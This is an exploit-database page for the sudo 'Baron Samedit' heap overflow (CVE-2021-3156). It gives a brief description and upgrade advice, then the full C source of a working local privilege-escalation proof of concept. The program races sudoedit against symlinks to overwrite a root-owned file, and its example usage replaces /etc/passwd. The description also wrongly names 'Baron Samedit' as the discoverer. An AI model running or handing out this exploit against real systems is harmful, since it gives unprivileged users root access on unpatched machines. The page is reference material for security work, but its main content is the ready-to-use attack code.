Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)

vendor:

Sudo

by:

cts, r4j, nu11secur1ty

7.8

CVSS

HIGH

Heap-Based Buffer Overflow

119

CWE

Product Name: Sudo

Affected Version From: 1.9.5p1

Affected Version To: 1.9.5p1

Patch Exists: YES

Related CWE: CVE-2021-3156

CPE: a:sudo:sudo:1.9.5p1

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04 and 20.04 & 20.04.01

2021

Sudo 1.9.5p1 – ‘Baron Samedit ‘ Heap-Based Buffer Overflow Privilege Escalation (2)

This exploit is a proof-of-concept for the Sudo 1.9.5p1 vulnerability, which is a heap-based buffer overflow privilege escalation vulnerability. It was discovered by Baron Samedit of Qualys and was exploited by cts with help from r4j and debugged by nu11secur1ty. The exploit was tested on Ubuntu 18.04 and 20.04 & 20.04.01. The exploit code is written in C and is designed to overwrite the target file with the contents of the source file. The exploit requires the user to adjust the RACE_SLEEP_TIME variable to the best value for the system.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Sudo, which is 1.9.5p2. Additionally, users should ensure that they are running the latest version of their operating system and that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)
# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty
# Date: 30.01.2021
# Vendor: https://www.sudo.ws/
# Link: https://www.sudo.ws/download.html
# CVE: CVE-2021-3156

[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021

[Exploit Program Code]

// Exploit by @gf_256 aka cts
// With help from r4j
// Debug by @nu11secur1ty
// Original advisory by Baron Samedit of Qualys

// Tested on Ubuntu 18.04 and 20.04 & 20.04.01
// You will probably need to adjust RACE_SLEEP_TIME.

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <pwd.h>

// !!! best value of this varies from system-to-system !!!
// !!! you will probably need to tune this !!!
#define RACE_SLEEP_TIME 10000

char *target_file;
char *src_file;

size_t query_target_size()
{
    struct stat st;
    stat(target_file, &st);
    return st.st_size;
}

char* read_src_contents()
{
    FILE* f = fopen(src_file, "rb");
    if (!f) {
        puts("oh no baby what are you doing :(");
        abort();
    }
    fseek(f, 0, SEEK_END);
    long fsize = ftell(f);
    fseek(f, 0, SEEK_SET);
    char *content = malloc(fsize + 1);
    fread(content, 1, fsize, f);
    fclose(f);
    return content;
}

char* get_my_username()
{
    // getlogin can return incorrect result (for example, root under su)!
    struct passwd *pws = getpwuid(getuid());
    return strdup(pws->pw_name);
}

int main(int my_argc, char **my_argv)
{
    puts("CVE-2021-3156 PoC by @gf_256");
    puts("original advisory by Baron Samedit");

    if (my_argc != 3) {
        puts("./meme <target file> <src file>");
        puts("Example: ./meme /etc/passwd my_fake_passwd_file");
        return 1;
    }
    target_file = my_argv[1];
    src_file = my_argv[2];
    printf("we will overwrite %s with stuff from %s\n", target_file, src_file);

    char* myusername = get_my_username();
    printf("hi, my name is %s\n", myusername);

    size_t initial_size = query_target_size();
    printf("%s is %zi big right now\n", target_file, initial_size);

    char* stuff_to_write = read_src_contents();

    char memedir[1000];
    char my_symlink[1000];
    char overflow[1000];

    char* bigstuff = calloc(1,0x10000);
    memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address

    char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL
    };

    char *envp[] = {
        "\n\n\n\n\n", // put some newlines here to separate our real contents from the junk stuff_to_write,
        "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
", bigstuff, NULL
    };

    puts("ok podracing time bitches");

    // Boom =)
    // for (int i = 0; i < 5000; i++)
    for (int i = 0; i < 3000; i++) {
        sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i);
        sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir);
        sprintf(my_symlink, "%s/%s", memedir, myusername);
        puts(memedir);

        if (access(memedir, F_OK) == 0) {
            printf("dude, %s already exists, do it from a clean working dir\n", memedir);
            return 1;
        }

        pid_t childpid = fork();
        if (childpid) { // parent
            usleep(RACE_SLEEP_TIME);
            mkdir(memedir, 0700);
            symlink(target_file, my_symlink);
            waitpid(childpid, 0, 0);
        } else { // child
            setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability
            execve("/usr/bin/sudoedit", argv, envp); // noreturn
            puts("execve fails?!");
            abort();
        }

        if (query_target_size() != initial_size) {
            puts("target file has a BRUH MOMENT!!!! SUCCess???");
            system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'");
// ayy lmao
            return 0;
        }
    }

    puts("Failed?");
    puts("if all the meme dirs are owned by root, the usleep needs to be decreased.");
    puts("if they're all owned by you, the usleep needs to be increased");

    return 0;
}